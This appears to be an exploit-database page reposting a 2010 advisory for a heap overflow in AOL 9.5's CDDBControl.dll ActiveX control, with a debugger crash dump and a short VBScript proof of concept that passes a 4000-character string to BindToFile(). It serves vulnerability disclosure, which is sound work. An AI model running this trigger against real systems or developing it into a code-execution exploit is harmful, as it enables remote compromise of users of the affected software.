AOL 9.5 ActiveX Heap Overflow Vulnerability

CVE	Category	Price	Severity
CVE-2008-2570	CWE-119	$10,000 - $25,000	High

Author	Risk	Exploitation Type	Date
Belahsan Ouerghi	High	Local	2010-01-22

CPE
cpe:cpe:/a:aol:aol_desktop:9.5

CVSS	EPSS	EPSSP
Not available	0.02192	0.50148

CVSS vector description

Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2010010074

Below is a copy:

Product:
AOL 9.5
 
Vulnerability:
ActiveX Heap Overflow
 
Discussion:
Vulnerability is in Activex Control ("CDDBControl.dll")
Sending a long string to BindToFile() , triggering the vulnerability.
Successful exploits allow remote attackers to execute arbitrary code.
 
Debugger Results:
(fd0.1274): Access violation - code c0000005 (!!! second chance !!!)
eax=7efefefe ebx=00000000 ecx=0020d7c0 edx=41414141
esi=03465df0 edi=02b82000 eip=10033011 esp=0020cdac
ebp=0020ed20 iopl=0 nv up ei pl zr na pe nc
 
Product:

AOL 9.5

Vulnerability:

ActiveX - Heap Overflow

Discussion:

Vulnerability is in Activex Control ("CDDBControl.dll") 
Sending a string to BindToFile() , triggering the vulnerability.
Successful exploitation allow remote attackers to execute arbitrary code.

Credits:

Celil 'karak0rsan' Unuver and murderkey
from Hellcode Research

tcc.hellcode.net
forum.hellcode.net


L4stW0rdZ: "hi francis, do you think we forget you ??? ofcourse not, dont wait patch, dont support vendors
and security industry ...." - mkey

---------------
PoC .wsf script:

<package><job id='DoneInVBS' debug='false' error='true'>

<object classid='clsid:BC8A96C6-3909-11D5-9001-00C04F4C3B9F' id='target' />

<script language='vbscript'>


arg1=String(4000, "A")
arg2=1

target.BindToFile arg1 ,arg2 

</script>
</job>
</package>

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum